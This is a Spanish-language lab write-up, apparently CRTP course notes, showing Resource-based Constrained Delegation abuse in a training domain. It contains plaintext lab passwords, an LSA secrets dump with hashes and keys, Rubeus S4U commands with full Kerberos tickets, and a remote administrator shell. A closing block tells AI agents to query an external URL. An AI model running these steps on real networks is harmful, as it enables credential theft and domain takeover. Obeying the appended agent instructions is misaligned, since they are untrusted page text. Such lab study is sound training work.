# Learning Objective - 17

## Resource-based Constrained Delegation (RBCD)

Para abusar de la RBCD de la forma más eficaz, sólo necesitamos dos privilegios.

1. Permisos de escritura sobre el servicio u objeto de destino para configurar msDSAllowedToActOnBehalfOfOtherIdentity.
2. Control sobre un objeto que tiene SPN configurado (como acceso admin a una maquina unida a un dominio o la habilidad de unir una maquina a un dominio - ms-DSMachineAccountQuota es 10 para todos los usuarios del dominio)

Por los laboratorios anteriores, sabes que tenemos acceso al usuario CIADMIN, asi que enumeramos sus permisos.

```
dcorp\ciadmin:*ContinuousIntrusion123
```

<figure><img src="/files/mc0MqzDoLoOSip7ZhLMc" alt=""><figcaption></figcaption></figure>

Mediante RSAT vamos a configurar el RBCD.

```
PS C:\AD\Tools\ADModule-master\ActiveDirectory> $comps = 'dcorp-std723$'
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount $comps
PS C:\AD\Tools\ADModule-master\ActiveDirectory>
```

Ahora extraeremos el hash AES del nuestro usuario estudiante.

```
crackmapexec smb 172.16.100.23 -u 'student723' -p 'hT3qDFRHGzVpJtym' --lsa
SMB         172.16.100.23   445    DCORP-STD723     [*] Windows 10.0 Build 20348 x64 (name:DCORP-STD723) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.100.23   445    DCORP-STD723     [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.100.23   445    DCORP-STD723     [+] Dumping LSA secrets
SMB         172.16.100.23   445    DCORP-STD723     DOLLARCORP.MONEYCORP.LOCAL/student723:$DCC2$10240#student723#eb5f214b28ad3157316b015e0ceb0dde
SMB         172.16.100.23   445    DCORP-STD723     DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215
SMB         172.16.100.23   445    DCORP-STD723     DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa9ef2da703179
SMB         172.16.100.23   445    DCORP-STD723     DOLLARCORP.MONEYCORP.LOCAL/websvc:$DCC2$10240#websvc#5100e73bf7f60de365fe1e39d21070c9
SMB         172.16.100.23   445    DCORP-STD723     DOLLARCORP.MONEYCORP.LOCAL/appadmin:$DCC2$10240#appadmin#8bb559da7ec65410afbd8c561b37f5b5
SMB         172.16.100.23   445    DCORP-STD723     dcorp\DCORP-STD723$:aes256-cts-hmac-sha1-96:8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595
SMB         172.16.100.23   445    DCORP-STD723     dcorp\DCORP-STD723$:aes128-cts-hmac-sha1-96:df30e9661d9fdbec4812b51673713729
SMB         172.16.100.23   445    DCORP-STD723     dcorp\DCORP-STD723$:des-cbc-md5:bf10e370e064101c
SMB         172.16.100.23   445    DCORP-STD723     dcorp\DCORP-STD723$:plain_password_hex:3c004300200059006e0020007900340038004e0057005900420031006c00440049004e00340043005e00220044003e005b0031003f00270037005f0020003a0051007700440042004a004300500059006c005f002b00600064003e002800720044007700360023007000270066002d006f0037003c0039005200710043005400790071006a007100520078005e0057002f00210040003700440024002a002c003b007600620063003e004f005400610058004700420058006d007100260030002f002f004300770044006d00600029002400290071006d005c0073004d003100580068004b0032006400730036002000
SMB         172.16.100.23   445    DCORP-STD723     dcorp\DCORP-STD723$:aad3b435b51404eeaad3b435b51404ee:b7e5761232035582a44230df3247d401:::
SMB         172.16.100.23   445    DCORP-STD723     dpapi_machinekey:0xababb32297aa7249ddae9c0653a6a1017e71b9a4
dpapi_userkey:0xf06a4a31213cab5931ec2c976ab3de2ec6297136
SMB         172.16.100.23   445    DCORP-STD723     NL$KM:2155a8f764dd9afa80950f03e8e4765e11349956de62e100c6fd7db814af4f7358c168e316e2049893a539c61b7ae419fee6efdc7364728cf92af25c68d2db73
SMB         172.16.100.23   445    DCORP-STD723     [+] Dumped 12 LSA secrets to /home/dsds/.cme/logs/DCORP-STD723_172.16.100.23_2024-03-03_192256.secrets and /home/dsds/.cme/logs/DCORP-STD723_172.16.100.23_2024-03-03_192256.cached

```

Luego, ejecutamos el rubeus.

```
PS C:\AD\Tools> .\Rubeus.exe s4u /user:dcorp-std723$ /aes256:8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\dcorp-std723$'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
      LmxvY2Fs


[*] Action: S4U

[*] Building S4U2self request for: 'dcorp-std723$@DOLLARCORP.MONEYCORP.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'dcorp-std723$@DOLLARCORP.MONEYCORP.LOCAL'
[*] base64(ticket.kirbi):

      doIGVzCCBlOgAwIBBaEDAgEWooIFQTCCBT1hggU5MIIFNaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
      T1JQLkxPQ0FMohowGKADAgEBoREwDxsNZGNvcnAtc3RkNzIzJKOCBPIwggTuoAMCARKhAwIBAqKCBOAE
      ggTcDiZfokRZXbTLQ0fLEDWhAlUDzf03O1ajhZ+rfUueWrQENaGiTBfWw+ahfflX/QKr94QR/djouKeP
      vhODBGL5R33bbqjy88wmt1P7p3kzrxeuFy006IE5X2ESWzu8witIC8j0pufBEukR5IP6O5HExsqAyR+J
      NVyNpIOJ2n4fVpP/+ugpZ4Hy4VHCr4RtTBlj3Xx4gDo+j6+FLN1Xxs8nwHmgqdrZETIkmMr9FqxuqgR7
      2GcUi+4IYIL3ORATYcrE/JH8vN5nVqbkfr5rx0Ec4yZ0fVkwIb14qeDKQgtZQvhDEIPA7r0jZ139/X5U
      g4sJd6TihD83u6jJaKKsQ8p1lj5qjHv1VIIMomXqCMaq4Xdp3Qhm4iUfTUCmjrUSpLob/csPt+jhZVn5
      dbvGvfu5A5uObsC8U+n12RLXoXS3+aIXAuvK+W4gMXBRxe0Xhk/yd+ijHshWaeoTyTL1XWBYc3fIvtDL
      RpsQfw95B/njfhfU3GIRQIkhdJokStSyuHjJ1lwy+uJNEUJMYiqI/UwdyXLVbdl8v83hvG9fZqa0+bvM
      EDtWgZkQ6fZokHOSZR99N2ORUr5JspVyNd4n8LKcuFBpAy3Wn6gfkuvdxp4/1MtAcCg4Hg+0C6YKxMSY
      q3eGJX9d5KFKlmAaRz1JGbYMGFn/XLuMljw3Tbs/qj0V5WS6MJRUzVg24np3gaSo/Zaz70m3mgmxlKwg
      ap+CJdjdwmlNHpo5UcXDQ1brTqYXVh5u198cHTJ3nsdfDqh6R/KUNweeT/4+sMSTPB2ElJVxbhbJ0iRL
      d8gRIkl6vTrVTUNpZNt+xJ7ny85hrWV+kBUihUcRUE9UCPoy4YpFkiF6mBDVdbEjqilNsR2fxfxYHyKN
      p/79XlwSMAaTiTP0qwlvUQBNWnb7qiMg66fBahUDgNTNiv4ze+lPb5z5CjcSAXfxWo/gCYdUegmrprUL
      qLZ0Ep4K8kpGPfW61xKXLKauAA4aOxd5LiL43rJfFsK/TbxAgEKCpWIozctsH7lf3OCOYbjmxcA7JpkC
      yQ+ck+5K84m9WCEywCK/+Ls6BcFSCIXFIvq6IOeC9Ut/nUSP/etxMK9sImzCr/XlzrZ+NzrfoHySCbDe
      1ieXMv8FGjeGn+mWna21sgVMnuMPnPJUUm+IlQebn4cwyUDUnyYyet91AUBP+yYDK5pNz7/oAfpdzii0
      FfYJuIYI6+lXlwlX5flPdpGUzWXQWw+aQNkhI0WVSAts0BLF8UQX6rtVmXgDS/NGVnSQAqkl7fiXgsnF
      PtrPsBw7uqNY5ew0fJhFYIRHoGSSD3oLurpUK/v8vmkMtVTyDYu+tjjrr1IdOYFgD3yVGs3YWT18jOtM
      tawK9fuK6EtBDsUlPcW9MUKiZm7/qKWd6oG6JaUHwbDP+SGmOFbOZQ8U9GMan/cuT6SWNjo4u+bdZ8e5
      eRdthk8SQx36www1qeeS+cQshqQCKoGHH1SfxK/wX71ZnCH7P/3AefMb3tUZ56AF0XRfp2Fw6s1aQIp/
      yT+Mnc0KDaUOelpzkvFP/zdkRAIdCo2peUEGPUVeag2ZdHx4g4i9INk+o9xWvCj3YvhkfAXhR96IlzbY
      XcPSltaqSDp51sbNIdVVgSojEB5lAUgj4e7iyVaUQ27/w3yjexd6DWIEryIQotKjggEAMIH9oAMCAQCi
      gfUEgfJ9ge8wgeyggekwgeYwgeOgKzApoAMCARKhIgQgHf7JuTYsspE7T5GSSRrC/6QbI546r5+nL4sA
      uW6vxgWhHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJh
      dG9yowcDBQBAoQAApREYDzIwMjQwMzA0MDA0MDE1WqYRGA8yMDI0MDMwNDEwNDAxNVqnERgPMjAyNDAz
      MTEwMDQwMTVaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqRowGKADAgEBoREwDxsNZGNvcnAt
      c3RkNzIzJA==

[*] Impersonating user 'administrator' to target SPN 'http/dcorp-mgmt'
[*] Building S4U2proxy request for service: 'http/dcorp-mgmt'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'http/dcorp-mgmt':

      doIHBDCCBwCgAwIBBaEDAgEWooIF/DCCBfhhggX0MIIF8KADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
      T1JQLkxPQ0FMoh0wG6ADAgECoRQwEhsEaHR0cBsKZGNvcnAtbWdtdKOCBaowggWmoAMCARKhAwIBAaKC
      BZgEggWUvzMFfAGSEAcM5Hd2pSaGJ5bzAP3/0u9GZZNLYqrM0Z4eVjJynrbxc8rvgFc8fWY+Fy6PsqQJ
      vDUEFqoO6x1zi+F9+o4rdoEvRJ3GpiODLzqpgRRbuvTJVS+naj3Y642AHS2ZF5cpSm3PFXdhqZdVZHvE
      ZtA/PVUthZxhH2ni570Ba7s5EvaIXWT8vLeFXI0p0Qkcd5rZQkJDHl84BCuMHgv7mkZNozjdUcudzZ7T
      CzjF2Aa1dtGbm7CzVYHvJUHl0SW0fDj6pZM5nT7RsjKbuUy13UY7ZME59D22XIkKUwCY+Jwif+AUuP6m
      rSzv0w9bGaMqsjtvo+cpZ3T4UK52ZvSvQcJd4+vT2BUW75aeW9MDcqsVdYlJRflu+O3KxSNnvLYeH5U7
      QA1GsW0KbBYbbA3rVQX1T22SNK7HjlsXjv8CUW2SjfbNy2Qyrg62HMedc2OMyagLWnHI80o3V/hmxRPF
      n28nqyohv/u/SCcouEU842jQPMky0W+O/1LZ1D/nIPfGKF+kw6Hmn824es066bn/M7U9uxYwJr1VbsgW
      hVTr1Ofv4092g64TT/i/m2H/rqDmZA1bJKqDRleBVcCbQT1+auR8jc8xMexRv78DpLsIveAH3rYKxwSq
      Ki5XY/WrJpKSDBi0AAhQ36nD5j+MOnlKqRzbX+tQ/F8d/TXuQgSv+/R4Tvb4P7IUYsNsFUcX//fpOE0q
      StofwYWMXKvbmWLcF8xIUbzhlKML80FVFfWviTAdxKBjeo4vonIHu4/ARNrC8BZHK/l2KlzvRFpd1KhL
      XcTcSYOQISRWBcQvmryV+vAOIPVMk9j7KUPwsR0fjSEoC6elDYh61d7qPWoRCrzqSjmVGkIp4vp5SrFm
      X0l6BFuF61LTjWOBJPOcYYNmO/dekJcxCjHsPq3AY5uYg4e0jNtSzgWOX/msCfu6o92tB+PRKGCIkt4Z
      u4FIvbGlMlEifB4HSDJrYcj/0M9qj9+OZ6EUSbkyzJRxUqoXBWMRuOwCmSU1ADgNybSb/OLiVLsoYnWg
      ueEsQx7sa+aLNXLljodsrSzIhL8gWa1MrC/QM/jLPuuwwPdzJ/KTiiHTy8k+zWdKSdmHa3lZdcu8g01R
      Mc0WR/1cvNNKDzYyBkQyS7tIvGb64uOO8bydwBm5Pn8ZWoWEAptGWijHQnl63IGm2mOebOJ3mac2Qoxd
      gi7SybmtTjbHt/vlW/mg4YrFVJ1r8Gj2mcJL6JokZk3OF/B94Xv2Bgj/TgQqdI7WGnXURWSCu6th8cHB
      hdMPJTZMhd+4cRl8WyhBSmH9qiT/86zlgxkF6Rfa6ejccgwRCK40f11wJOqB0Q0ZvTCmj4eS2HbVIGBu
      3WjvsF/FcgENSXCLJ1JOk8EPQDLnst60MzoP/eNTVcAUnzeEdCamte+1/2BbcO3BFonX0owc08xjJz+g
      y17qNpWkvT95c5Wt1LXsSOr5D0yJ5VGwZxXKx7JbwHwgGgelEjWFR11WH/ni2wN77DK4XK9yCIySHJUa
      JO1C9TPIz2Vu+LVREjpKwDZDfABzceaOV4eAKKHrc+wzx3CSFc29Uf18gmW5vqNHcDh6wk7sxw1Mcj1B
      /A5Lks7wIwKZbVHzrf6ILiMlPUhCOI1nHKjx3eAL0Qsy7jTJbSrPkwUPaA8t8LgE6XOpQ0jhRGOCJOc6
      DMBeS+56PVa6fCcIBMdiRmNiqW3Q4aQJ+krPTXi0vat+YCV7OnyH3v6NuqKuy7kFPCWqMUBqS1lFUhH8
      CVHlV5c1r6D3qWwRcCCxYfDK5b9vuQnJRh27INOOdYAduwLxJ+H9j94UHAiRnMQMteOF4DLQ+SgPvYir
      BRCKrcIS6P6Da/J/Xfn0v8QGm0eYwxvrwVRXSxjUWDSwwvm3Gb6AKGSiOb+Elurzj1+/AwGdo4HzMIHw
      oAMCAQCigegEgeV9geIwgd+ggdwwgdkwgdagGzAZoAMCARGhEgQQ2hbTLg9AUyNNoalpYtGNf6EcGxpE
      T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAECh
      AAClERgPMjAyNDAzMDQwMDQwMTVaphEYDzIwMjQwMzA0MTA0MDE1WqcRGA8yMDI0MDMxMTAwNDAxNVqo
      HBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypHTAboAMCAQKhFDASGwRodHRwGwpkY29ycC1tZ210
[+] Ticket successfully imported!
PS C:\AD\Tools> klist

Current LogonId is 0:0xe922452

Cached Tickets: (1)

#0>     Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: http/dcorp-mgmt @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 3/3/2024 16:40:15 (local)
        End Time:   3/4/2024 2:40:15 (local)
        Renew Time: 3/10/2024 16:40:15 (local)
        Session Key Type: AES-128-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
```

Luego de esto, con el ticket cargado, iniciamos una cmd remota con winrs.

```
PS C:\AD\Tools> winrs -r:dcorp-mgmt cmd.exe
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator.dcorp>hostname
hostname
dcorp-mgmt

C:\Users\Administrator.dcorp>whoami
whoami
dcorp\administrator

```

## Conclusion:

Explotar RBCD te permite obtener RCE en un objeto al cual solo contabas con permisos GenericWrite.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-17.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.